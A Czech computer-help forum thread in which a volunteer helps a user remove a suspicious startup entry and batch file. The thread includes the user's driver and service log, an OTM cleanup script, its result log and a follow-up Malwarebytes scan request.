R1 prodrv06;StarForce Protection Environment Driver v6; C:\WINDOWS\System32\drivers\prodrv06.sys [2004-08-09 53920]
R2 aswFsBlk;aswFsBlk; C:\WINDOWS\system32\drivers\aswFsBlk.sys [2010-05-06 19024]
R2 aswMon2;avast! Standard Shield Support; C:\WINDOWS\system32\drivers\aswMon2.sys [2010-05-06 100432]
R3 ALCXSENS;Service for WDM 3D Audio Driver; C:\WINDOWS\system32\drivers\ALCXSENS.SYS [2004-02-24 400384]
R3 ALCXWDM;Service for Realtek AC97 Audio (WDM); C:\WINDOWS\system32\drivers\ALCXWDM.SYS [2004-08-30 637713]
R3 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr.sys [2010-05-06 23376]
R3 ati2mtag;ati2mtag; C:\WINDOWS\system32\DRIVERS\ati2mtag.sys [2004-12-01 873984]
R3 ms_mpu401;Microsoft MPU-401 MIDI UART Driver; C:\WINDOWS\system32\drivers\msmpu401.sys [2001-08-18 2944]
R3 rtl8139;Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver; C:\WINDOWS\system32\DRIVERS\RTL8139.SYS [2004-08-03 20992]
S1 InCDPass;InCDPass; C:\WINDOWS\system32\drivers\InCDPass.sys []
S1 InCDRm;InCD Reader; C:\WINDOWS\system32\drivers\InCDRm.sys []
S1 rxp;rxp; \??\C:\WINDOWS\system32\drivers\rxp.sys []
S3 61883;61883 Unit Device; C:\WINDOWS\system32\DRIVERS\61883.sys [2004-08-04 48128]
S3 Arp1394;Protokol 1394 ARP Client; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2004-08-03 60800]
S3 Avc;AVC Device; C:\WINDOWS\system32\DRIVERS\avc.sys [2004-08-04 38912]
S3 CCDECODE;Dekodér Closed Caption; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2004-08-04 17024]
S3 CrystalSysInfo;CrystalSysInfo; \??\C:\Program Files\MediaCoder\SysInfo.sys []
S3 DM9102;DAVICOM 9102(A) PCI Fast Ethernet Based NT Driver; C:\WINDOWS\system32\DRIVERS\DM9PCI5.SYS [2001-08-17 29696]
S3 MREMP50;MREMP50 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50.SYS []
S3 MREMP50a64;MREMP50a64 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MREMP50a64.SYS []
S3 MREMPR5;MREMPR5 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS []
S3 MRENDIS5;MRENDIS5 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS []
S3 MRESP50;MRESP50 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50.SYS []
S3 MRESP50a64;MRESP50a64 NDIS Protocol Driver; \??\C:\PROGRA~1\COMMON~1\Motive\MRESP50a64.SYS []
S3 MSDV;Microsoft DV Camera and VCR; C:\WINDOWS\System32\DRIVERS\msdv.sys [2004-08-04 51328]
S3 MSTEE;Microsoft Streaming Tee/Sink-to-Sink Converter; C:\WINDOWS\system32\drivers\MSTEE.sys [2004-08-03 5504]
S3 NABTSFEC;NABTS/FEC VBI Codec; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2004-08-04 85376]
S3 NdisIP;Microsoft TV/Video Connection; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2004-08-04 10880]
S3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2004-08-03 61824]
S3 nvax;Service for NVIDIA(R) nForce(TM) Audio Enumerator; C:\WINDOWS\system32\drivers\nvax.sys [2002-12-05 13056]
S3 nvnforce;Service for NVIDIA(R) nForce(TM) Audio; C:\WINDOWS\system32\drivers\nvapu.sys [2002-12-05 241664]
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2004-08-04 11136]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2004-08-04 15360]
S3 usbaudio;Ovladač zvukové karty USB (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2004-08-04 59264]
S3 usbccgp;Obecný nadřazený ovladač Microsoft USB; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2004-08-04 31616]
S3 USBSTOR;Ovladač velkokapacitního paměťového zařízení USB; C:\WINDOWS\System32\DRIVERS\USBSTOR.SYS [2004-08-04 26496]
S3 WpdUsb;WpdUsb; C:\WINDOWS\System32\Drivers\wpdusb.sys [2005-01-28 18944]
S3 WSTCODEC;Dálnopisný kodek světového standardu; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2004-08-04 19328]
S4 InCDFs;InCD File System; C:\WINDOWS\system32\drivers\InCDFs.sys []
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 Ati HotKey Poller;Ati HotKey Poller; C:\WINDOWS\system32\Ati2evxx.exe [2004-12-01 425984]
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-05-06 40384]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-08-27 153376]
R2 McciCMService;McciCMService; C:\Program Files\Common Files\Motive\McciCMService.exe [2007-10-15 303104]
R2 MDM;Machine Debug Manager; C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe [2001-02-23 270336]
R2 UleadBurningHelper;Ulead Burning Helper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [2004-02-26 49152]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-05-06 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-05-06 40384]
S2 ATI Smart;ATI Smart; C:\WINDOWS\system32\ati2sgag.exe [2004-11-30 516096]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632]
S3 MSCSPTISRV;MSCSPTISRV; C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [2006-12-14 45056]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2003-07-28 89136]
S3 PACSPTISVR;PACSPTISVR; C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [2006-12-14 57344]
S3 SonicStage Back-End Service;SonicStage Back-End Service; C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe [2007-02-05 112184]
S3 SPTISRV;Sony SPTI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe [2006-12-14 69632]
S3 SSScsiSV;SonicStage SCSI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe [2007-02-05 75320]
-----------------EOF-----------------
Mockrát díky za radu, asi nebudu vypínat počítač, dokud mi někdo neporadí:-D
Blbá srandička
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Vážení uživaterlé!
Ve dnech 4. - 6-9.2026 budou někteříí naši členové na každoročním srazu fóra. Žádáme vás, abyste měli strpení, nemusí se na na řešení vašeho problému dostat hned. Děkujeme za pochopení.
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Vážení uživaterlé!
Ve dnech 4. - 6-9.2026 budou někteříí naši členové na každoročním srazu fóra. Žádáme vás, abyste měli strpení, nemusí se na na řešení vašeho problému dostat hned. Děkujeme za pochopení.
- cernohous13
- VIP in memoriam

- Příspěvky: 8720
- Registrován: 09 Pro 2006 06:19
- Místo/Bydliště: Jablonec nad Nisou
- Kontaktovat uživatele:
Re: Blbá srandička
Zdravím,
Script OTMStáhni OTM z jednoho odkazu a rozbal nejlépe na plochu.
http://oldtimer.geekstogo.com/OTM.exe
http://www.itxassociates.com/OT-Tools/OTM.exe
Spusť program „OTM.exe“ (pro Vistu a Win7 – pravým a „Run As Administrator“).
Do okna pod žlutou čáru vlož celý text zeleným písmem ze „Scriptu“
Klikni na červené „Moveit!“
Při nabídce restartu „YES“
a log potom najdeš v C:\_OTM\MovedFiles\
Kód: Vybrat vše
:Commands
[emptytemp]
:Reg
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ImagePath"=-
:Files
C:\windows\system_32.batDoporučení:
V průběhu léčení prováděj nové instalace a odinstalace jen na můj pokyn.
Důkladně prostuduj a proveď celou operaci podle mé odpovědi.
V případě nejasností se zeptej - vysvětlím
-------------------------------------------------------------------------------------------------
> Podpora fóra <
V průběhu léčení prováděj nové instalace a odinstalace jen na můj pokyn.
Důkladně prostuduj a proveď celou operaci podle mé odpovědi.
V případě nejasností se zeptej - vysvětlím

-------------------------------------------------------------------------------------------------
> Podpora fóra <
-
Polokrumpáč
- Návštěvník

- Příspěvky: 2
- Registrován: 01 Dub 2011 18:18
Re: Blbá srandička
Vyjel mi tenhle log:
All processes killed
========== COMMANDS ==========
[EMPTYTEMP]
User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: All Users
User: blues
User: CDDB
User: classical
User: country
User: data
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Dokumenty
User: folk
User: Guest
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Hudba
User: jazz
User: jáchim
User: KryÜtofff
User: Kryštofff
->Temp folder emptied: 1307113579 bytes
->Temporary Internet Files folder emptied: 1823097881 bytes
->Java cache emptied: 62978576 bytes
->FireFox cache emptied: 74711321 bytes
->Flash cache emptied: 143180 bytes
User: LocalService
->Temp folder emptied: 65984 bytes
->Temporary Internet Files folder emptied: 32902 bytes
User: misc
User: MP3
User: My Music
User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 194268 bytes
User: newage
User: reggae
User: rock
User: soundtrack
User: Status
User: táta
->Temp folder emptied: 1565446 bytes
->Temporary Internet Files folder emptied: 66402 bytes
->FireFox cache emptied: 53889018 bytes
->Flash cache emptied: 7603 bytes
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 1119389 bytes
%systemroot%\System32 .tmp files removed: 38056 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 36135743 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 33170 bytes
RecycleBin emptied: 2591620306 bytes
Total Files Cleaned = 5 677.00 mb
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ImagePath deleted successfully.
========== FILES ==========
C:\windows\system_32.bat moved successfully.
OTM by OldTimer - Version 3.1.17.2 log created on 04012011_201403
Files moved on Reboot...
File move failed. C:\WINDOWS\temp\_avast5_\Webshlock.txt scheduled to be moved on reboot.
Registry entries deleted on Reboot...
Žádnej command už se nespustil a všechno vypadá v pořádku, mockrát děkuju za pomoc!
All processes killed
========== COMMANDS ==========
[EMPTYTEMP]
User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: All Users
User: blues
User: CDDB
User: classical
User: country
User: data
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Dokumenty
User: folk
User: Guest
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
User: Hudba
User: jazz
User: jáchim
User: KryÜtofff
User: Kryštofff
->Temp folder emptied: 1307113579 bytes
->Temporary Internet Files folder emptied: 1823097881 bytes
->Java cache emptied: 62978576 bytes
->FireFox cache emptied: 74711321 bytes
->Flash cache emptied: 143180 bytes
User: LocalService
->Temp folder emptied: 65984 bytes
->Temporary Internet Files folder emptied: 32902 bytes
User: misc
User: MP3
User: My Music
User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 194268 bytes
User: newage
User: reggae
User: rock
User: soundtrack
User: Status
User: táta
->Temp folder emptied: 1565446 bytes
->Temporary Internet Files folder emptied: 66402 bytes
->FireFox cache emptied: 53889018 bytes
->Flash cache emptied: 7603 bytes
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 1119389 bytes
%systemroot%\System32 .tmp files removed: 38056 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 36135743 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 33170 bytes
RecycleBin emptied: 2591620306 bytes
Total Files Cleaned = 5 677.00 mb
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ImagePath deleted successfully.
========== FILES ==========
C:\windows\system_32.bat moved successfully.
OTM by OldTimer - Version 3.1.17.2 log created on 04012011_201403
Files moved on Reboot...
File move failed. C:\WINDOWS\temp\_avast5_\Webshlock.txt scheduled to be moved on reboot.
Registry entries deleted on Reboot...
Žádnej command už se nespustil a všechno vypadá v pořádku, mockrát děkuju za pomoc!
- cernohous13
- VIP in memoriam

- Příspěvky: 8720
- Registrován: 09 Pro 2006 06:19
- Místo/Bydliště: Jablonec nad Nisou
- Kontaktovat uživatele:
Re: Blbá srandička
Ještě to zkontrolujeme
Stáhni a nainstaluj MBAM zde http://www.download.com/Malwarebytes-An ... tag=button
Spustit > na 3.záložce "Aktualizace" > Kontrola aktualizací
následně na 1.záložce "Kontrolor" -> Rychlá kontrola -> Prohledat
po dokončení scanu vyskočí okno Notepad s výsledkem - obsah zkopíruj do své odpovědi
zatím nic nemazat - počkej na posouzení
Doporučení:
V průběhu léčení prováděj nové instalace a odinstalace jen na můj pokyn.
Důkladně prostuduj a proveď celou operaci podle mé odpovědi.
V případě nejasností se zeptej - vysvětlím
-------------------------------------------------------------------------------------------------
> Podpora fóra <
V průběhu léčení prováděj nové instalace a odinstalace jen na můj pokyn.
Důkladně prostuduj a proveď celou operaci podle mé odpovědi.
V případě nejasností se zeptej - vysvětlím

-------------------------------------------------------------------------------------------------
> Podpora fóra <
Přispějete na provoz fóra?